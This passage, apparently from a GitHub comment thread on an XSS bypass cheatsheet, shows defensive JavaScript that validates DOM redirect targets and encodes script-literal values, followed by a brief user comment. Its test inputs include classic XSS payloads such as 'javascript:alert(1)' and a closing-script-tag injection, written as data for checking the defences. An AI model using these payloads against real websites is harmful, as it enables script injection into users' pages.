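// Case 2: location.href assigned from user input (the dom_redirect sink).
// Resolve against the page URL, then allow only http(s) targets on the
// same origin: javascript:, data:, vbscript: and //attacker/ are rejected.
function safeNavigationTarget(input, pageUrl) {
  let target;
  try {
    target = new URL(input, pageUrl);
  } catch (e) {
    return null;                       // unparsable input: do not navigate
  }
  if (target.protocol !== 'http:' && target.protocol !== 'https:') return null;
  if (target.origin !== new URL(pageUrl).origin) return null;
  return target.href;
}

// Constructed sample inputs, taken from the PoC URLs in the cheatsheet.
const PAGE = 'https://vulnerabledoma.in/bypass/dom_redirect';
console.log(renderScriptBlock('";alert(1)//'));
console.log(renderScriptBlock('</script><script>alert(1)</script>'));
console.log(safeNavigationTarget('javascript:alert(1)', PAGE));   // null
console.log(safeNavigationTarget('//attacker/', PAGE));           // null
console.log(safeNavigationTarget('/bypass/next', PAGE));
```

The encoder is for the string-literal context only; a value placed in HTML text, an attribute, or a URL needs the encoder for that context.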

@jcubic

jcubic commented Jan 10, 2023

@w1redch4d I don't think that adding it as a comment to an issue is really helpful. But thanks for the effort anyway. I hope that it will help those that don't know what Google Translate is and how to use it.
